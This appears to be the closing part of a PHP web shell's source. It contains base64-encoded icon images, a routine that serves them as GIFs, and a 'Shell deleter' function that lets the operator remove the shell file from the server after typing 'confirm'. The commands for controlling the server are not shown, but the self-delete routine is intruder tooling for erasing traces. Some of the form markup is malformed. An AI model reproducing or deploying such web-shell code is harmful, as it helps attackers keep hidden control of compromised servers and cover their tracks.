"0iLb2O80s8JcfVJJTaGYrZYPNby5Ov6WolPD+XDJqAgSQ4EUCGQQEJADs=", "binary"=>"R0lGODlhFAAWAMIAAP///8z//8zMzJmZmTMzMwAAAAAAAAAAACH+TlRoaXMgYXJ0I GlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AABACwAAAAAFAAW" . "AAADaUi6vPEwEECrnSS+WQoQXSEAE6lxXgeopQmha+q1rhTfakHo/HaDnVFo6LMYKYPkoOADim4 VJdOWkx2XvirUgq" . "VaVcbuxCn0hKe04znrIV/ROOvaG3+z63OYO6/uiwlKgYJJOxFDh4hTCQA7", "text"=>"R0lGODlhFAAWAOMAAP/////MM/8zM8z//5mZmZlmM2bM/zMzMwAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAACH+TlRoaX" . "MgYXJ0IGlzIGluIHRoZSBwdWJsaWMgZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY 29tLCBTZXB0ZW1i" . "ZXIgMTk5NQAh+QQBAAADACwAAAAAFAAWAAAEb/DISee4eBzAu99Hdm1eSYbZWXEkgI5sEBg0+2H nTBsccvhAmGtXAy" . "COSITwUGg2PYQoQalhOZ/QKLVV6gKmQm8XXDUmzx0yV5ze9s7JdpgtL3ME5jhHTS/xO3hwdWt0f 317WwdSi4xRPxlw" . "kUgXEQA7", "compressed"=>"R0lGODlhFAAWAOcAAP//////zP//mf//Zv//M///AP/M///MzP/Mmf/MZv/MM //MAP+Z//+ZzP+Zmf+ZZv+ZM/+ZAP" . "9m//9mzP9mmf9mZv9mM/9mAP8z//8zzP8zmf8zZv8zM/8zAP8A//8AzP8Amf8AZv8AM/8AAMz// 8z/zMz/mcz/Zsz/" . "M8z/AMzM/8zMzMzMmczMZszMM8zMAMyZ/8yZzMyZmcyZZsyZM8yZAMxm/8xmzMxmmcxmZsxmM8x mAMwz/8wzzMwzmc" . "wzZswzM8wzAMwA/8wAzMwAmcwAZswAM8wAAJn//5n/zJn/mZn/Zpn/M5n/AJnM/5nMzJnMmZnMZ pnMM5nMAJmZ/5mZ" . "zJmZmZmZZpmZM5mZAJlm/5lmzJlmmZlmZplmM5lmAJkz/5kzzJkzmZkzZpkzM5kzAJkA/5kAzJk AmZkAZpkAM5kAAG" . "b//2b/zGb/mWb/Zmb/M2b/AGbM/2bMzGbMmWbMZmbMM2bMAGaZ/2aZzGaZmWaZZmaZM2aZAGZm/ 2ZmzGZmmWZmZmZm" . "M2ZmAGYz/2YzzGYzmWYzZmYzM2YzAGYA/2YAzGYAmWYAZmYAM2YAADP//zP/zDP/mTP/ZjP/MzP /ADPM/zPMzDPMmT" . "PMZjPMMzPMADOZ/zOZzDOZmTOZZjOZMzOZADNm/zNmzDNmmTNmZjNmMzNmADMz/zMzzDMzmTMzZ jMzMzMzADMA/zMA" . "zDMAmTMAZjMAMzMAAAD//wD/zAD/mQD/ZgD/MwD/AADM/wDMzADMmQDMZgDMMwDMAACZ/wCZzAC ZmQCZZgCZMwCZAA" . "Bm/wBmzABmmQBmZgBmMwBmAAAz/wAzzAAzmQAzZgAzMwAzAAAA/wAAzAAAmQAAZgAAM+4AAN0AA LsAAKoAAIgAAHcA" . "AFUAAEQAACIAABEAAADuAADdAAC7AACqAACIAAB3AABVAABEAAAiAAARAAAA7gAA3QAAuwAAqgA AiAAAdwAAVQAARA" . "AAIgAAEe7u7t3d3bu7u6qqqoiIiHd3d1VVVURERCIiIhEREQAAACH+TlRoaXMgYXJ0IGlzIGluI HRoZSBwdWJsaWMg" . "ZG9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQ BAAAkACwAAAAAFA" . "AWAAAImQBJCCTBqmDBgQgTDmQFAABDVgojEmzI0KHEhBUrWrwoMGNDihwnAvjHiqRJjhX/qVz5D +VHAFZiWmmZ8BGH" . "ji9hxqTJ4ZFAmzc1vpxJgkPPn0Y5CP04M6lPEkCN5mxoJelRqFY5TM36NGrPqV67Op0KM6rYnku p/gMq1mdamC1tdn" . "36lijUpwjr0pSoFyUrmTJLhiTBkqXCgAA7", "sound"=>"R0lGODlhFAAWAMIAAP////8zM8z//8zMzJmZmWYAADMzMwAAACH+TlRoaXMgYXJ0IG lzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AACACwAAAAAFAAW" . "AAADayi63P4wNsNCkOocYVWPB7FxFwmFwGh+DZpynndpNAHcW9cVQUj8tttrd+G5hMINT7A0BpE 4ZnF6hCqn0iryKs" . "0SDN9v0tSc0Q4DQ1SHFRjeBrQ6FzNN5Co2JD4YfUp7GnYsexQLhBiJigsJADs=", "script"=>"R0lGODlhFAAWAMIAAP///8z//5mZmTMzMwAAAAAAAAAAAAAAACH+TlRoaXMgYXJ0I GlzIGluIHRoZSBwdWJsaWMgZG" . "9tYWluLiBLZXZpbiBIdWdoZXMsIGtldmluaEBlaXQuY29tLCBTZXB0ZW1iZXIgMTk5NQAh+QQBA AABACwAAAAAFAAW" . "AAADZTi6vPEwDECrnSO+aTvPEddVIrhVBJCSF8QRMIwOBE2fVLrmcYz3O4pgKCDgVMgR0SgZOYV

M0dNS/AF7gGy1me" . "16v9vXNdYNf89es2os00bRcDW7DVDDwe87fjMg+v9DNxBzYw8JADs="); header("Content-type: image/gif"); echo(base64_decode($images[$img])); die(); } function kill(){ // Shell deleter function style(); echo("<form method='post'>"); echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' a ction='$me&act=kill'>"); echo("<input type='submit' value='Delete'>"); echo("</form>"); if(@$_POST['ver'] == "confirm"){ $self = basename($_SERVER['PHP_SELF']); if(unlink($self)) echo("Deleted"); else echo("Failed"); } } die(); ?>